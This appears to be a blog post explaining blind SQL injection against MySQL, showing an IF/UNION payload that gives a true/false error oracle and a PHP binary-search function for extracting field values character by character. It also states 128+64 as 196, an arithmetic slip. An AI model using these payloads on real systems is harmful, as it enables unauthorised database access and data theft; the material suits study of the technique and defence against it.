1=IF(1=1,1,(SELECT 1 UNION SELECT 2)) will work as 1=1 equals true. The 'if' statement will output 1. However when we take 1=2, which ofcourse is false, the unification of the 2 select queries will occur this will result into an error. Mysql will now try to match the subquery to '1' which will produce an error since we have 1 and 2. The error message will be something like: 'subquery return more then one row' or something like that. However, even if you get no error and just a white page it's a good indication of wether your query was succesful or not.
Now we have a true and false case we can start bruteforcing field values by ASCII(SUBSTRING(field_name,position,1)) and equal the outcome of that to an ASCII value.
Looping through every possible ASCII value is not a good idea to do. You will generate like a ton of requests. Instead you should do a binary search. This will result in the big O notation: O(Log n) which is a lot faster than O(n). For the ascii table this will mean you got 256 possibilities. First check we need to do is to see if the value we want to know is higher than 128 (256/2). If it is we will check if the value is higher than 128+(128/2) since we know the value is between 128 and 256. anyway if the value is less than 128+64. We know the value is between 128 and 196. This way we can narrow the value down to 1. In just 8 steps you will have the exact value. A certain implementation in php will look something like this:
private function determineValue($injection, $min = 0, $max = 32) {
$value = ceil(($max-$min)/2);
while ($max - $min > 1)
{
$result = $this->get(sprintf($injection, $value));
$max = ($result) ? $value : $max;
$min = ($result) ? $min : $value;
$subtract = ($result) ? 0 : 1;
$newValue = ceil(($max-$min)/2);
$value = ($result) ? $value - $newValue : $value + $newValue;
if (($max - $min) == 1)
return ($value - $subtract);
}
}
That's about it..
No comments:
Post a Comment